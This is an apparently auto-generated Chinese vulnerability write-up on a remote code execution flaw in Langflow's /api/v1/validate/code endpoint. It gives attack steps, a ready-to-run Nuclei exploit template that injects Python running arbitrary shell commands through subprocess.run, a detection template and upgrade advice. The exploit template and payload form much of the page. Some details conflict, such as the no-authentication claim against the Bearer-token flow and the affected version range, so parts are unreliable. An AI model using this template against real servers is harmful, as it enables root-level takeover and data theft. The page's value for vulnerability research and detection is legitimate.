[webapps] Langflow 1.3.0 - Remote Code Execution

📋 漏洞基础信息

🔬 漏洞根因

validate端点在exec_globals参数中包含了来自不受信任控制范围的功能，允许攻击者通过构造恶意code字段注入Python代码，利用subprocess.run执行系统命令，且无需认证即可触发。

🎯 攻击场景

1. 攻击者获取目标主机地址（如127.0.0.1）；2. 若auto_login启用，直接访问/api/v1/auto_login获取access_token；否则使用提供的用户名密码登录获取access_token；3. 构造包含恶意subprocess.run的code JSON数据；4. 向/api/v1/validate/code发送POST请求，带上Authorization头；5. 命令执行结果通过异常信息回显在响应中；成功标志为输出命令执行结果。

💥 漏洞影响

远程攻击者无需认证即可在Langflow服务器上以root权限执行任意系统命令，导致完全控制服务器、数据泄露、横向移动等严重危害。

⚔️ Nuclei Exploit 模板

以下为标准 Nuclei v3 格式的利用模板，可直接用于漏洞验证：

id: CVE-2026-0770-exploit

info:
  name: Langflow 1.3.0 - Remote Code Execution Exploit
  author: diamorphine
  severity: critical
  description: |
    Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere 
    in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root.
  reference:
    - https://www.langflow.org/
  tags: langflow,rce,cve-exploit

variables:
  cmd: 'id'
  username: 'admin'
  password: 'admin'

http:
  - raw:
      - |
        GET /api/v1/auto_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

      - |
        POST /api/v1/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    cookie-reuse: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: word
        words:
          - '"access_token"'
        condition: and
        part: body
    extractors:
      - type: json
        name: access_token
        part: body
        json:
          - '.access_token'

  - raw:
      - |
        POST /api/v1/validate/code HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{access_token}}
        Content-Type: application/json

        {"code":"\ndef exploit(\n    _=( lambda r: (_ for _ in ()).throw(Exception(f\"{r.stdout}{r.stderr}\")) )(\n        __import__('subprocess').run('{{cmd}}', shell=True, capture_output=True, text=True)\n    )\n):\n    pass\n"}

    matchers:
      - type: word
        words:
          - 'function'
        part: body
    extractors:
      - type: regex
        name: output
        part: body
        regex:
          - '"errors":\["([^"]+)"\]'
        group: 1
    stop-at-first-match: true

🔬 深度技术分析

PoC定义了两种模式：无需认证模式通过访问/api/v1/auto_login获取access_token；需要认证模式通过/api/v1/login获取access_token。获取token后，构造code字段，其中包含一个lambda函数，该函数调用subprocess.run执行用户传入的命令（如id），并将标准输出和标准错误拼接后抛出异常，异常信息被捕获并打印，从而回显命令输出。

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2026-0770-detection

info:
  name: Langflow 1.3.0 - Remote Code Execution Detection
  author: diamorphine
  severity: critical
  description: |
    Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere 
    in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root.
    This template detects if the target is running Langflow version <= 1.2.0.
  reference:
    - https://www.langflow.org/
  tags: langflow,rce,cve-detection

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/v1/auto_login'
      - '{{BaseURL}}/login'
      - '{{BaseURL}}/'
    host-redirects: true
    max-redirects: 3
    matchers-condition: or
    matchers:
      - type: word
        words:
          - 'Langflow'
          - '"access_token"'
        condition: or
        part: body
      - type: status
        status:
          - 200
          - 401
        condition: or
    extractors:
      - type: regex
        part: body
        regex:
          - '<title>Langflow</title>'
          - 'Langflow'
        group: 1
    stop-at-first-match: true

🛡️ 修复建议

升级至Langflow 1.3.0以上版本（官方已修复）；临时措施：在validate接口实施强身份认证、输入验证和沙箱隔离，或通过反向代理限制访问该端点。

📎 参考链接

• https://www.langflow.org/
• https://github.com/langflow-ai/langflow
• Exploit-DB 原文

🚨 威胁评估

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-30 08:15 | 来源: Exploit-DB